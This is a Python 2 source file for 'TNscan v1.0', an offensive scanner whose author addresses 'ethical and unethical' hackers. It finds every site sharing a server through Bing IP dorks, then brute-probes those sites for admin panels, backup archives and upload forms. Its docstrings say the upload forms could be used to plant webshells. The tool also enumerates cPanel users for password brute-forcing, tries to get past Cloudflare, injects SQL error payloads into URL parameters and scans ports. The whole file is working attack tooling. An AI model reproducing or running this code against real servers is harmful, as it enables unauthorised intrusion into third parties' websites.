TNscan v1.0

1. #!/usr/bin/env python2
2. # >>> Bism Allah <<<
3. # Code Name : TNscan v1.0
4. # Coder     : MatriX Coder (17 yo guy from Tunisia)
5. # Blog      : www.matrixcoder.co.vu  
6. # Twitter   : MatriX_Coder
7. # Pastebin  : www.pastebin.com/u/matrixcoder
8. # this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
9. # Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
10. #              greats also to tunisia fallega team and to madleets team and to you !
11. # Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
12.  
13. import re, urllib2, urllib, os, socket, sys
14. from platform import system
15. logo = """
16. \t _____ _   _                    
17. \t|_   _| \ | |                    
18. \t  | | |  \| |___  ___ __ _ _ __  
19. \t  | | | . ` / __|/ __/ _` | '_ \
20. \t  | | | |\ \__ \ (_| (_| | | | |
21. \t  \_/ \_| \_/___/\___\__,_|_| |_| v1.0
22.                                                  
23. """
24.  
25. menu = """
26. 1) Get all websites
27. 2) Get joomla websites
28. 3) Get wordpress websites
29. 4) Find control panel
30. 5) Find zip files
31. 6) Find upload files
32. 7) Get server users
33. 8) Scan from SQL injection
34. 9) Crawl and scan from SQL injection (soon)
35. 10) Scan ports (range of ports)
36. 11) Scan ports (common ports  )
37. 12) Get server banner
38. 13) Bypass Cloudflare
39. 14) About !
40. 99) Exit
41. """
42. def unique(seq):
43.     """
44.     get unique from list found it on stackoverflow
45.     """
46.     seen = set()
47.     return [seen.add(x) or x for x in seq if x not in seen]
48.    
49. def clearScr() :
50.     """
51.     clear the screen in case of GNU/Linux or
52.     windows
53.     """
54.     if system() == 'Linux':
55.         os.system('clear')
56.     if system() == 'Windows':
57.         os.system('cls')
58.  
59. class TNscan :
60.     def __init__(self, serverip) :
61.         self.serverip = serverip
62.         self.getSites(False)
63.         print menu
64.         while True :
65.             choice = raw_input(' Enter choice -> ')
66.             if choice == '1' :
67.                 self.getSites(True)
68.             elif choice == '2' :
69.                 self.getJoomla()
70.             elif choice == '3' :
71.                 self.getWordpress()
72.             elif choice == '4' :
73.                 self.findPanels()
74.             elif choice == '5' :
75.                 self.findZip()
76.             elif choice == '6' :
77.                 self.findUp()
78.             elif choice == '7' :
79.                 self.getUsers()
80.             elif choice == '8' :
81.                 self.grabSqli()
82.             elif choice == '10' :
83.                 ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ')
84.                 self.portScanner(1, ran)
85.             elif choice == '11' :
86.                 self.portScanner(2, None)
87.             elif choice == '12' :
88.                 self.getServerBanner()
89.             elif choice == '13' :
90.                 self.cloudflareBypasser()
91.             elif choice == '14' :
92.                 self.aboutME()
93.             elif choice == '99' :
94.                 print ' Goodbye'
95.                 exit()
96.             con = raw_input(' Continue [Y/n] -> ')
97.             if con[0].upper() == 'N' :
98.                 exit()
99.             else :
100.                 clearScr()
101.                 print logo
102.                 print menu
103.        
104.     def aboutME(self) :
105.         clearScr()
106.         print """
107. >>> Bism Allah <<<
108. Code Name : TNscan v1.0
109. Coder     : MatriX Coder (17 yo guy from Tunisia)
110. Blog      : www.matrixcoder.co.vu  
111. Twitter   : MatriX_Coder
112. Pastebin  : www.pastebin.com/u/matrixcoder
113. this a developed version of al-swisre code (well i think it's even better) anyway greats to that man
114. Greats to : all Muslim (ethical and unethical) Hackers who are fighting for an issue
115.         greats also to tunisian fallega team, to madleets team and to you !
116. Wroten with <3 in my arch machine using geany, a cup of tea and while listening to jazz
117. """
118.    
119.     def getSites(self, a) :
120.         """
121.         get all websites on same server
122.         from bing search
123.         """
124.         lista = []
125.         page = 1
126.         while page <= 101:
127.             try:
128.                 bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
129.                 openbing = urllib2.urlopen(bing)
130.                 readbing = openbing.read()
131.                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
132.                 for i in range(len(findwebs)):
133.                     allnoclean = findwebs[i]
134.                     findall1 = re.findall('http://(.*?)/', allnoclean)
135.                     for idx, item in enumerate(findall1):
136.                         if 'www' not in item:
137.                             findall1[idx] = 'http://www.' + item + '/'
138.                         else:
139.                             findall1[idx] = 'http://' + item + '/'
140.                     lista.extend(findall1)
141.                    
142.                 page += 50
143.             except urllib2.URLError:
144.                 pass
145.         self.sites = unique(lista)
146.         if a :     
147.             clearScr()
148.             print '[*] Found ', len(lista), ' Website\n'
149.             for site in self.sites :
150.                 print site
151.            
152.     def getWordpress(self) :
153.         """
154.         get wordpress site using a dork the attacker
155.         may do a password list attack (i did a tool for that purpose check my pastebin)
156.         or scan for common vulnerabilities using wpscan for example (i did a simple tool
157.         for multi scanning using wpscan)
158.         """
159.         lista = []
160.         page = 1
161.         while page <= 101:
162.             try:
163.                 bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+?page_id=&count=50&first=" + str(page)
164.                 openbing = urllib2.urlopen(bing)
165.                 readbing = openbing.read()
166.                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
167.                 for i in range(len(findwebs)):
168.                     wpnoclean = findwebs[i]
169.                     findwp = re.findall('(.*?)\?page_id=', wpnoclean)
170.                     lista.extend(findwp)
171.                 page += 50
172.             except:
173.                 pass
174.         lista = unique(lista)
175.         clearScr()
176.         print '[*] Found ', len(lista), ' Wordpress Website\n'
177.         for site in lista :
178.             print site
179.  
180.     def getJoomla(self) :
181.         """
182.         get all joomla websites using
183.         bing search the attacker may bruteforce
184.         or scan them
185.         """
186.         lista = []
187.         page = 1
188.         while page <= 101:
189.             bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+index.php?option=com&count=50&first=" + str(page)
190.             openbing = urllib2.urlopen(bing)
191.             readbing = openbing.read()
192.             findwebs = re.findall('<h2><a href="(.*?)"', readbing)
193.             for i in range(len(findwebs)):
194.                 jmnoclean = findwebs[i]
195.                 findjm = re.findall('(.*?)index.php', jmnoclean)
196.                 lista.extend(findjm)
197.             page += 50
198.         lista = unique(lista)
199.         clearScr()
200.         print '[*] Found ', len(lista), ' Joomla Website\n'
201.         for site in lista :
202.             print site
203.  
204.        
205.     def findPanels(self) :
206.         """
207.         find panels from grabbed websites
208.         the attacker may do a lot of vulnerabilty
209.         tests on the admin area
210.         """
211.         adminList = ['admin/', 'site/admin', 'admin.php/', 'up/admin/', 'central/admin/', 'whm/admin/', 'whmcs/admin/', 'support/admin/', 'upload/admin/', 'video/admin/', 'shop/admin/', 'shoping/admin/', 'wp-admin/', 'wp/wp-admin/', 'blog/wp-admin/', 'admincp/', 'admincp.php/', 'vb/admincp/', 'forum/admincp/', 'up/admincp/', 'administrator/', 'administrator.php/', 'joomla/administrator/', 'jm/administrator/', 'site/administrator/', 'install/', 'vb/install/', 'dimcp/', 'clientes/', 'admin_cp/', 'login/', 'login.php', 'site/login', 'site/login.php', 'up/login/', 'up/login.php', 'cp.php', 'up/cp', 'cp', 'master', 'adm', 'member', 'control', 'webmaster', 'myadmin', 'admin_cp', 'admin_site']
212.         clearScr()
213.         for site in self.sites :
214.             for admin in adminList :
215.                 if urllib.urlopen(site + admin).getcode() == 200 :
216.                     print " [*] Found admin panel -> ", site + admin
217.    
218.     def findZip(self) :
219.         """
220.         find zip files from grabbed websites
221.         it may contain useful informations
222.         """
223.         zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
224.         clearScr()
225.         for site in self.sites :
226.             for zip1 in zipList :
227.                 if urllib.urlopen(site + zip1).getcode() == 200 :
228.                     print " [*] Found zip file -> ", site + zip1
229.                    
230.     def findUp(self) :
231.         """
232.         find upload forms from grabbed
233.         websites the attacker may succeed to
234.         upload malicious files like webshells
235.         """
236.         upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
237.         clearScr()
238.         for site in self.sites :
239.             for up in upList :
240.                 if (urllib.urlopen(site + up).getcode() == 200) :
241.                     html = urllib.urlopen(site + up).readlines()
242.                     for line in html :
243.                         if re.findall('type=file', line) :
244.                             print " [*] Found upload -> ", site+up
245.                        
246.     def getUsers(self) :
247.         """
248.         get server users using a method found by
249.         iranian hackers i think, the attacker may
250.         do a bruteforce attack on CPanel, ssh, ftp or
251.         even mysql if it supports remote login
252.         (you can use medusa or hydra)
253.         """
254.         userslist = []
255.         for site in self.sites :
256.             try:
257.                 site = site.replace('http://www.', '')
258.                 site = site.replace('http://', '')
259.                 site = site.replace('.', '')
260.                 if '-' in site:
261.                     site = site.replace('-', '')
262.                 site = site.replace('/', '')
263.  
264.                 while len(site) > 2:
265.                     resp = urllib2.urlopen(site + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
266.                     if 'invalid username' not in resp.lower():
267.                         print '\t [*] Found -> ', site
268.                         userslist.append(site)
269.                     else :
270.                         print site
271.                        
272.                     site = site[:-1]
273.                    
274.                 clearScr()
275.                 for user in userlist :
276.                     print user
277.  
278.             except:
279.                 pass
280.            
281.     def cloudflareBypasser(self) :
282.         """
283.         trys to bypass cloudflare i already wrote
284.         in my blog how it works, i learned this
285.         method from a guy in madleets
286.         """
287.         clearScr()
288.         subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
289.         for site in self.sites :
290.             site.replace('http://', '')
291.             site.replace('/', '')          
292.             try:
293.                 ip = socket.gethostbyname(site)
294.             except socket.error:
295.                 pass
296.             for sub in subdoms:
297.                 doo = sub + '.' + site
298.                 print ' [~] Trying -> ', doo
299.                 try:
300.                     ddd = socket.gethostbyname(doo)
301.                     if ddd != ip:
302.                         print ' [*] Cloudflare bypassed -> ', ddd
303.                         break
304.                 except socket.error :
305.                     pass
306.                        
307.     def getServerBanner(self) :
308.         """
309.         simply gets the server banner
310.         the attacker may benefit from it
311.         like getting the server side software
312.         """
313.         clearScr()
314.         try:
315.             s = 'http://' + self.serverip
316.             httpresponse = urllib.urlopen(s)
317.             print ' [*] Server header -> ', httpresponse.headers.getheader('server')
318.         except:
319.             pass
320.            
321.     def grabSqli(self) :
322.         """
323.         just grabs all websites in server with php?id= dork
324.         for scanning for error based sql injection
325.         """
326.         page = 1
327.         lista = []
328.         while page <= 101:
329.             try:
330.                 bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page)
331.                 openbing = urllib2.urlopen(bing)
332.                 readbing = openbing.read()
333.                 findwebs = re.findall('<h2><a href="(.*?)"', readbing)
334.                 for i in range(len(findwebs)):
335.                     x = findwebs[i]
336.                     lista.append(x)
337.             except:
338.                 pass           
339.             page += 50 
340.         lista = unique(lista)      
341.         self.checkSqli(lista)
342.        
343.     def checkSqli(self, s):
344.         """
345.         checks for error based sql injection,
346.         most of the codes here are from webpwn3r
347.         project the one who has found an lfi in
348.         yahoo as i remember, you can find a separate
349.         tool in my blog
350.         """
351.         clearScr()
352.         payloads = ["3'", "3%5c", "3%27%22%28%29", "3'><", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"]
353.         check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I)
354.         for url in s:
355.             try:
356.                 for param in url.split('?')[1].split('&'):
357.                     for payload in payloads:
358.                         power = url.replace(param, param + payload.strip())
359.                         #print power
360.                         html = urllib2.urlopen(power).readlines()
361.                         for line in html:
362.                             checker = re.findall(check, line)
363.                             if len(checker) != 0 :
364.                                 print ' [*] SQLi found -> ', power
365.             except:
366.                 pass
367.    
368.     def crawlSqli(self) :
369.         """
370.         simple crawling using chilkat (yeah chilkat sucks)
371.         and scan for error based sql injection
372.         [!] will be on the next version
373.         """
374.         pass
375.    
376.     def portScanner(self, mode, ran) :
377.         """
378.         simple port scanner works with range of ports
379.         or with common ports (al-swisre idea)
380.         """
381.         clearScr()
382.         def do_it(ip, port):
383.             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
384.             #sock.settimeout(5)
385.             sock = sock.connect_ex((ip,port))
386.             if sock == 0:
387.                 print " [*] Port %i is open" % port
388.        
389.         if mode == 1 :
390.             a = ran.split('-')
391.             start = int(a[0])
392.             end = int(a[1])
393.             for i in range(start, end):
394.                 do_it(self.serverip, i)
395.         elif mode == 2 :
396.             for port in [80,21,22,2082,25,53,110,443,143] :
397.                 # didn't use multithreading cos it's few ports
398.                 do_it(self.serverip, port)
399.  
400. if __name__ == '__main__' :
401.     try :
402.         clearScr()
403.         print logo
404.         TNscan(sys.argv[1])
405.     except IndexError :
406.         print " [*] Usage : python "+sys.argv[0]+" 127.0.0.1"